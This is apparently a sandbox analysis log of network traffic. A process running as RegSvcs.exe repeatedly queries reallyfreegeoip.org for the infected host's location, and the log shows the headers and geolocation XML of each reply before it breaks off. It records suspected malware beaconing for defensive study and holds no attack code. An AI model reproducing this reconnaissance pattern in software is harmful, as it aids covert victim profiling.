                                                                                                                                      0192.168.2.549705188.114.97.34433688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-06 11:44:57 UTC87OUTGET /xml/173.254.250.80 HTTP/1.1
                                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      2024-11-06 11:44:57 UTC1218INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 06 Nov 2024 11:44:57 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 359
                                                                                                                                      Connection: close
                                                                                                                                      x-amzn-requestid: 9bc882c6-79f2-4519-942c-9a988b7ce8d5
                                                                                                                                      x-amzn-trace-id: Root=1-672b39b7-2aea25c92b76380c57f02b5b;Parent=7aaad53b6bd38774;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                      via: 1.1 bf9e5565039f7e32c47e53e1895197ba.cloudfront.net (CloudFront)
                                                                                                                                      x-amz-cf-pop: DFW57-P5
                                                                                                                                      x-amz-cf-id: LvPVug8Ta1AvDo7CVtDky3YkXV9WgQyS7vNag26vEt1ucU6wXAjPVQ==
                                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                      Age: 7426
                                                                                                                                      Last-Modified: Wed, 06 Nov 2024 09:41:11 GMT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=orxcuVAm9ad0FeMf7Zx56xJ7rOoLSeIaTc12xtS7iU%2BEuh06fD47yLnlAGRFoFRe4EnIeMNQR2uDLfYTGqwKJQdfKvRRUPxXwm%2B9%2FAYSc5%2Fe0wxJGKDuJ3v6hNx8WvMQwTMAzKqE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8de4d5a7ae863acf-DFW
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1929&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2080459&cwnd=230&unsent_bytes=0&cid=5d01e64cb02006e3&ts=217&x=0"
                                                                                                                                      2024-11-06 11:44:57 UTC151INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e
                                                                                                                                      Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>
                                                                                                                                      2024-11-06 11:44:57 UTC208INData Raw: 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                                                      Data Ascii: Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      1192.168.2.549706188.114.97.34433688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-06 11:44:58 UTC63OUTGET /xml/173.254.250.80 HTTP/1.1
                                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                                      2024-11-06 11:44:58 UTC1220INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 06 Nov 2024 11:44:58 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 359
                                                                                                                                      Connection: close
                                                                                                                                      x-amzn-requestid: 9bc882c6-79f2-4519-942c-9a988b7ce8d5
                                                                                                                                      x-amzn-trace-id: Root=1-672b39b7-2aea25c92b76380c57f02b5b;Parent=7aaad53b6bd38774;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                      via: 1.1 bf9e5565039f7e32c47e53e1895197ba.cloudfront.net (CloudFront)
                                                                                                                                      x-amz-cf-pop: DFW57-P5
                                                                                                                                      x-amz-cf-id: LvPVug8Ta1AvDo7CVtDky3YkXV9WgQyS7vNag26vEt1ucU6wXAjPVQ==
                                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                      Age: 7427
                                                                                                                                      Last-Modified: Wed, 06 Nov 2024 09:41:11 GMT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xBZJVX5TICBZO%2FDKjQd0Je%2B3odS1p%2Fvf0sD13VuSEkXJXoHw6dCRdrUe3CCAOUGYc2ZwdyYdbVVW9%2Bf3I%2F5jM2qFdWKCfgKSkF6TBFtLGXu8NUfF4YZqXr5W5jyXw58XDYC9u7S5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8de4d5ad8b40477a-DFW
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1952&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1448724&cwnd=226&unsent_bytes=0&cid=ce3d571200eeb2f6&ts=165&x=0"
                                                                                                                                      2024-11-06 11:44:58 UTC149INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d
                                                                                                                                      Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNam
                                                                                                                                      2024-11-06 11:44:58 UTC210INData Raw: 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                                                      Data Ascii: e>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      2192.168.2.549708188.114.97.34433688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-06 11:45:00 UTC87OUTGET /xml/173.254.250.80 HTTP/1.1
                                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      2024-11-06 11:45:00 UTC1218INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 06 Nov 2024 11:45:00 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 359
                                                                                                                                      Connection: close
                                                                                                                                      x-amzn-requestid: 9bc882c6-79f2-4519-942c-9a988b7ce8d5
                                                                                                                                      x-amzn-trace-id: Root=1-672b39b7-2aea25c92b76380c57f02b5b;Parent=7aaad53b6bd38774;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                      via: 1.1 bf9e5565039f7e32c47e53e1895197ba.cloudfront.net (CloudFront)
                                                                                                                                      x-amz-cf-pop: DFW57-P5
                                                                                                                                      x-amz-cf-id: LvPVug8Ta1AvDo7CVtDky3YkXV9WgQyS7vNag26vEt1ucU6wXAjPVQ==
                                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                      Age: 7429
                                                                                                                                      Last-Modified: Wed, 06 Nov 2024 09:41:11 GMT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MaZSN8FAxaIelmLjBhAjcA63lZRL5uOarIV%2FjBrhBOBoK3ul6zfwpBEkkqsoH9LHm%2FtH5Ne9Oc85kZDUR3phAV60MQVfLJFwzpZZgOUj2%2B4IVn6Hqovt%2FxlgqFdNFCqoVuXnnndy"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8de4d5b7aad94778-DFW
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1918&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1537971&cwnd=249&unsent_bytes=0&cid=4ddfe15be7a11711&ts=150&x=0"
                                                                                                                                      2024-11-06 11:45:00 UTC151INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e
                                                                                                                                      Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>
                                                                                                                                      2024-11-06 11:45:00 UTC208INData Raw: 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                                                      Data Ascii: Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      3192.168.2.549710188.114.97.34433688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-06 11:45:03 UTC87OUTGET /xml/173.254.250.80 HTTP/1.1
                                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      2024-11-06 11:45:03 UTC1220INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 06 Nov 2024 11:45:03 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 359
                                                                                                                                      Connection: close
                                                                                                                                      x-amzn-requestid: 9bc882c6-79f2-4519-942c-9a988b7ce8d5
                                                                                                                                      x-amzn-trace-id: Root=1-672b39b7-2aea25c92b76380c57f02b5b;Parent=7aaad53b6bd38774;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                      via: 1.1 bf9e5565039f7e32c47e53e1895197ba.cloudfront.net (CloudFront)
                                                                                                                                      x-amz-cf-pop: DFW57-P5
                                                                                                                                      x-amz-cf-id: LvPVug8Ta1AvDo7CVtDky3YkXV9WgQyS7vNag26vEt1ucU6wXAjPVQ==
                                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                      Age: 7432
                                                                                                                                      Last-Modified: Wed, 06 Nov 2024 09:41:11 GMT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rw2ADa%2BZQdaa6FEBPAs0OmI%2Bf4KGYoEyXyYTBCG%2BNIMHQiIu1edOv3F7uzMkBsesFW7WmRSDnID%2BKubVw97bJeoTY6xBDJ9dm4QKYgNu9PiGaWUMUECLx%2BSbyH3P9NGMq4MPAFWB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8de4d5ceb9d42cc9-DFW
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1628&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1725864&cwnd=251&unsent_bytes=0&cid=f8a92c034159d84f&ts=387&x=0"
                                                                                                                                      2024-11-06 11:45:03 UTC149INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d
                                                                                                                                      Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNam
                                                                                                                                      2024-11-06 11:45:03 UTC210INData Raw: 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                                                      Data Ascii: e>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      4192.168.2.549713188.114.97.34433688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-06 11:45:11 UTC87OUTGET /xml/173.254.250.80 HTTP/1.1
                                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      2024-11-06 11:45:11 UTC1218INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 06 Nov 2024 11:45:11 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 359
                                                                                                                                      Connection: close
                                                                                                                                      x-amzn-requestid: 9bc882c6-79f2-4519-942c-9a988b7ce8d5
                                                                                                                                      x-amzn-trace-id: Root=1-672b39b7-2aea25c92b76380c57f02b5b;Parent=7aaad53b6bd38774;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                      via: 1.1 bf9e5565039f7e32c47e53e1895197ba.cloudfront.net (CloudFront)
                                                                                                                                      x-amz-cf-pop: DFW57-P5
                                                                                                                                      x-amz-cf-id: LvPVug8Ta1AvDo7CVtDky3YkXV9WgQyS7vNag26vEt1ucU6wXAjPVQ==
                                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                      Age: 7440
                                                                                                                                      Last-Modified: Wed, 06 Nov 2024 09:41:11 GMT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4ehEDDCe7Bz7mb8aYtaKFEIo0cGy%2FTxKWPPcVb6oQy8iUbdg2JMqf0dYjg4EM8qefwzV%2FaFsVgvoUwy76JhivlpAGbt58ttOBo1W%2F0QrVVjJrL7ZZKhXS3%2FFnzQoPv2yNYevU7uQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8de4d5fd1c22476e-DFW
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1252&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2214067&cwnd=246&unsent_bytes=0&cid=85e101b5d11eca26&ts=145&x=0"
                                                                                                                                      2024-11-06 11:45:11 UTC151INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e
                                                                                                                                      Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>
                                                                                                                                      2024-11-06 11:45:11 UTC208INData Raw: 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                                                      Data Ascii: Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      5192.168.2.549727188.114.97.34433688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-06 11:45:16 UTC87OUTGET /xml/173.254.250.80 HTTP/1.1
                                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      2024-11-06 11:45:16 UTC1214INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 06 Nov 2024 11:45:16 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 359
                                                                                                                                      Connection: close
                                                                                                                                      x-amzn-requestid: 9bc882c6-79f2-4519-942c-9a988b7ce8d5
                                                                                                                                      x-amzn-trace-id: Root=1-672b39b7-2aea25c92b76380c57f02b5b;Parent=7aaad53b6bd38774;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                      via: 1.1 bf9e5565039f7e32c47e53e1895197ba.cloudfront.net (CloudFront)
                                                                                                                                      x-amz-cf-pop: DFW57-P5
                                                                                                                                      x-amz-cf-id: LvPVug8Ta1AvDo7CVtDky3YkXV9WgQyS7vNag26vEt1ucU6wXAjPVQ==
                                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                      Age: 7445
                                                                                                                                      Last-Modified: Wed, 06 Nov 2024 09:41:11 GMT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZREy84w%2BuJ2kdTYxrKmaw6oK4g1mApmIpM%2FkDGgrfv3fhu8hChmhZpw7kZTesOBFvViZZtZuukLvqzCw111vTGBvLaquRkngFUL17OGZN0PJvTBjj4antJFahNJEONuXKPMq8tU9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8de4d61c7ed46c51-DFW
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1236&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2576512&cwnd=250&unsent_bytes=0&cid=ddfb2a79bed30dc5&ts=154&x=0"
                                                                                                                                      2024-11-06 11:45:16 UTC155INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61
                                                                                                                                      Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texa
                                                                                                                                      2024-11-06 11:45:16 UTC204INData Raw: 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                                                      Data Ascii: s</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      6192.168.2.549739188.114.97.34433688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-06 11:45:18 UTC63OUTGET /xml/173.254.250.80 HTTP/1.1
                                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                                      2024-11-06 11:45:18 UTC1217INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 06 Nov 2024 11:45:18 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 359
                                                                                                                                      Connection: close
                                                                                                                                      x-amzn-requestid: 9bc882c6-79f2-4519-942c-9a988b7ce8d5
                                                                                                                                      x-amzn-trace-id: Root=1-672b39b7-2aea25c92b76380c57f02b5b;Parent=7aaad53b6bd38774;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                      via: 1.1 bf9e5565039f7e32c47e53e1895197ba.cloudfront.net (CloudFront)
                                                                                                                                      x-amz-cf-pop: DFW57-P5
                                                                                                                                      x-amz-cf-id: LvPVug8Ta1AvDo7CVtDky3YkXV9WgQyS7vNag26vEt1ucU6wXAjPVQ==
                                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                                      CF-Cache-Status: HIT
